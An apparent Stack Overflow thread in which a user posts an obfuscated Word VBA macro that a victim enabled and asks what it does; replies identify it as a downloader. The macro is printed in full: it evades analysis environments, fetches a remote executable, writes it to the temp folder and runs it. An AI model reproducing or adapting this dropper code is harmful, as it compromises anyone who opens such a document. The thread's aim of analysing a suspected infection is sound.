-6

Can someone translate what that micro does please? I got user open the word document and enable the micro on that document. I haven't seen anything strange like encrypting the files and stuffs yet. I have scanned the computer and found nothing.

word_image

//-------------------------------------------------------------------

Public Sub Document_Close()
On Error GoTo pvvXLG
NTglSIW
Exit Sub
pvvXLG:
End Sub
Public Sub NTglSIW()
Dim GTXXYW As String
Dim ibsUqd As String
Set eIEoA = CallByName(ThisDocument, s(58, "tpaAcniolip", 108), 2)
If CallByName(eIEoA, s(68, "NresUema", 79), 2) = s(36, "SPSWBUP", 48) Then DypEq (s(99, " daBemanresu", 71))
If CallByName(CallByName(eIEoA, s(85, "csineeFeRlt", 95), 2), s(17, "tuCno", 27), 2) < 3 Then DypEq (s(63, "dythars Boi", 106))
Set dEwGV = NKccF(s(75, "t.qnH.RWistp1uHt5eintp.Wet", 245))
CallByName dEwGV, s(21, "pOne", 19), 1, s(13, "EGT", 8), s(138, "/tomscgat1m.h2cwm/d/yii:iexp//mt.owev.w/pn", 145), False
CallByName dEwGV, s(158, "ueaetdsReterHqSe", 99), 1, s(46, "feerRer", 68), s(343, "tmdmywotodxm/lhcaa-//s.-me:nsdp.tseeniwap/ri-wc", 322)
CallByName dEwGV, s(158, "ueaetdsReterHqSe", 99), 1, s(52, "esUtnegA-r", 29), s(388, "b60iMIiaN/;.  owl0tl. noEdtT5 0MTmsl./e1(dz ei .W)Srp a06;;coi1n", 83)
CallByName dEwGV, s(15, "dneS", 19), 1
If CallByName(dEwGV, s(16, "utatSs", 65), 2) >= 400 Then DypEq (s(31, "el atr PCadtIscd' soane", 110))
GTXXYW = CallByName(dEwGV, s(83, "nxpTestoeseR", 53), 2)
For Each hVzop In inwGjsO
If InStr(LCase(GTXXYW), LCase(hVzop)) <> 0 Then DypEq (s(10, "dSB PaI:", 59) & hVzop)
Next
CallByName dEwGV, s(21, "pOne", 19), 1, s(13, "EGT", 8), s(87, "5teoexcf.tdrr.gibpgracici:aoso/en/rnfmo1h/ttm/f", 55), False
CallByName dEwGV, s(158, "ueaetdsReterHqSe", 99), 1, s(52, "esUtnegA-r", 29), s(388, "b60iMIiaN/;.  owl0tl. noEdtT5 0MTmsl./e1(dz ei .W)Srp a06;;coi1n", 83)
CallByName dEwGV, s(15, "dneS", 19), 1
If CallByName(dEwGV, s(16, "utatSs", 65), 2) >= 400 Then DypEq (s(161, "oiewnCnaalrnoy'a tdf  idbl", 185))
Set WZxmL = CallByName(NKccF(s(19, "pclhtrWe.iSlS", 17)), s(107, "vtmrnnniEeo", 106), 2, s(15, "EPCSOSR", 68))
ibsUqd = WZxmL(s(14, "METP", 39)) & CallByName(eIEoA, s(50, "SprtraheaaoPt", 111), 2) & s(18, "tpm64.mtp98", 17)
Set oWaKVom = NKccF(s(38, "ODAmaertS.BD", 131))
CallByName oWaKVom, s(7, "epyT", 27), 4, 1
CallByName oWaKVom, s(21, "pOne", 19), 1
CallByName oWaKVom, s(18, "ertWi", 13), 1, CallByName(dEwGV, s(97, "eRndpBesyoos", 89), 2)
knhPKY CallByName(oWaKVom, s(48, "TaloveFeSi", 53), 1, ibsUqd, 2)
knhPKY CallByName(oWaKVom, s(48, "elsCo", 43), 1)
knhPKY CallByName(NKccF(s(19, "pclhtrWe.iSlS", 17)), s(18, "exEc", 35), 1, ibsUqd)
End Sub
Public Sub knhPKY(ByVal KhHfp)
End Sub
Public Function inwGjsO()
inwGjsO = nRnWXq(Array(s(46, "OZAMAN", 11), s(69, "NNSOYOAUM", 22), s(112, "FDBDEEIENRT", 59), s(21, "OLCB TEAU", 97), s(92, "OCT IESSMYCSS", 120), _
s(23, "REVRES", 53), s(160, "NLOORNTHSCSEETI GGO", 93), s(53, "NOMER RCDTI", 85), s(20, "WVTUTAERS", 23), s(62, "RMAHROACTEN I", 138), _
s(69, "YEIEERF", 24), s(12, "EIFCOTRPNO", 27), s(53, "OITRNFTE", 59), s(46, "NZTEHRE", 13), s(49, "OHDETS", 53), s(24, "SGTHION", 30), _
s(12, "EBAWLSEE", 11), s(94, "COISMOTRF", 70), s(22, "CROFNE", 35), s(52, "HS OSVA", 9), s(15, "PFOORPTNIO", 59), s(17, "ESYTIRUC", 63), _
s(53, "LDOCU", 12), s(14, "NAEDCR EATT", 86), s(17, "TNECATADRE", 79), s(97, "ETERACTDAN", 27), s(98, "AETDEIDCD", 56), s(62, ",PETSLE OS", 37), _
s(135, "TOOLEMAARPKCSUCKB", 72), s(79, "TSACEMIM", 23), s(37, "CIMDNERTOR", 69)))
End Function
Public Sub DypEq(ByVal gokOtzS As String)
Err.Raise Number:=2, Description:=gokOtzS
End Sub
Public Function NKccF(ByVal BItPSle As String)
Set NKccF = IXCHMN(CreateObject(BItPSle))
End Function
Public Function IXCHMN(ByVal qrfTD As Object)
Set IXCHMN = qrfTD
End Function
Public Function nRnWXq(ByVal FprBLin)
nRnWXq = FprBLin
End Function
Public Function s(ByVal DSiduK As Integer, ByVal TMIZAzM As String, ByVal ZEYKFFg As Integer) As String
Dim bNDTc As Integer
bNDTc = llGhqz(DSiduK, Len(TMIZAzM))
Do While Len(s) < Len(TMIZAzM)
s = s & fQeBD(TMIZAzM, bNDTc)
bNDTc = llGhqz((bNDTc + ZEYKFFg), Len(TMIZAzM))
Loop
End Function
Public Function fQeBD(ByVal FfvxYfH As String, ByVal bNDTc As Integer) As String
fQeBD = Right(Left(FfvxYfH, bNDTc + 1), 1)
End Function
Public Function llGhqz(ByVal VlKeYlp As Integer, ByVal rrBefv As Integer) As Integer
llGhqz = VlKeYlp - (rrBefv * (VlKeYlp \ rrBefv))
End Function

//-------------------------------------------------------------------

Maarten van Stam
  • 1,901
  • 1
  • 11
  • 16
user1215305
  • 1
  • Seeing "esUtnegA-r" (reversed "r-AgentUse") and all those undirected things, I would throw it away. Looks part of a farm bot, but I am absolutely not familiar with hacking and such. – Joop Eggen Sep 19 '16 at 06:21

1 Answers1

0

It's just a downloader. It downloads a file from a particular URL and then launches it. That file is unavailable at the moment, so that's all I can tell.

Alexander.K.Polyakov
  • 51
  • 2